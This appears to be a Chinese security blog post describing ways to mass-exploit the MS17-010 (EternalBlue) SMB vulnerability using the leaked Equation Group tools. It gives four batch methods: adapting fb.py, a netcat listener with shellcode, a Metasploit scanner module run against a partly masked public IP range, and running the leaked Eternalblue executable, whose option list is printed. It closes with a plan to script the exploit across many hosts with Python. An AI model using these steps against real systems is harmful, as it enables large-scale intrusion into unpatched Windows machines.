MS17010之批量的一些思路

已经半个月没有更新了，放心朋友们，你们的晨星先生不是进局子了，而是现实中碰到了点问题。唉，搞安全人的宿命呀。那天晴姑娘跑来问我怎么没有更新，而那时候微信已经卸载了，和她通电话后了解到什么叫解放以及体会到读书使我快乐... 一周看似短短的，然而我已经错过了好多东西.... 首先那天Equation Group泄露的黑客武器出来，跟进复现了一波，结果就交给了同事们和团队的同学们了。本来想 搞个批量的，后面拖到了现在... 其次也没有帮东"棒打安全狗"，最后微信取消了IOS客户端的赞赏了，也就是说有人收不到我的赞赏了 : ( 我也收不到部分人的赞赏了~

为了恢复一下更新的节奏，晚上先更新一些简单的东西吧 。

首先是色楠同学的投稿，我一直逼着他写，哈哈。写东西写笔记才会有成长，当然最重要的是实战。

他的文章就是下面那一篇！

首先想说的就是MS17-010这个漏洞的批量利用，看到有孩子们一步一步的利用真是蛋疼...就和大家介绍下批量的方法~

方法一：利用已有的fb.py 改装，将交互的参数写死补上。

自己脑补

方法二：用nc -v -L -p xxx ，这是CC牛的方法，然后发送

shellcode（shellcode余弦博客发的那个脚本貌似有提取出来），这个可以不用msf。

方法三：用msf批量这个算是比较简单的吧，感觉扫描内网这个比较容易。

ruby的脚本在这里：

https://github.com/rapid7/metasploit-framework/blob/942959f7e8b3dee0031726d166002acae115694e/modules/auxiliary/scanner/smb/smb_ms17_010.rb

下载下来之后smb-17-010.rb拷贝到 /usr/share/metasploit-framework/modules/auxiliary/scanner/smb目录下。

理论上内外网都能扫描。

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 60.xxx.109.1-60.xxx.109.255

set rport 445

run

方法四：把工具包里\lib\x86-Windows目录下的dll文件拷贝到\windows\specials目录下，然后把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml，

然后就可以在CMD下运行Eternalblue-2.2.0了。

C:\ccsec\ms17-010>Eternalblue-2.2.0.exe –help Eternalblue 2.2.0 Usage: Eternalblue-2.2.0.exe Options: –NetworkTimeout S16 (default: 60) Timeout for blocking network calls (in seconds). Use -1 for no timeout. –TargetIp IPv4 Target IP Address –TargetPort TcpPort (default: 445) Port used by the SMB service for exploit connection –VerifyTarget Boolean (default: true) Validate the SMB string from target against the target selected before exp loitation. –VerifyBackdoor Boolean (default: true) Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts. –MaxExploitAttempts U32 (default: 3) Number of times to attempt the exploit and groom. Disabled for XP/2K3. –GroomAllocations U32 (default: 12) Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3 ) to do. [–LogFile String] Where to write log file –OutConfig String (default: stdout) Where to write output parameters file –ValidateOnly Boolean (default: false) Stop execution after parameter validation –Target Choice Operating System, Service Pack, and Architecture of target OS XP Windows XP 32-Bit All Service Packs WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs C:\ccsec\ms17-010>

然后批量？python的popen操作exe就不用我多说了吧，哈哈...CY表弟写了一个脚本，我改改加个多线程，过几天发吧。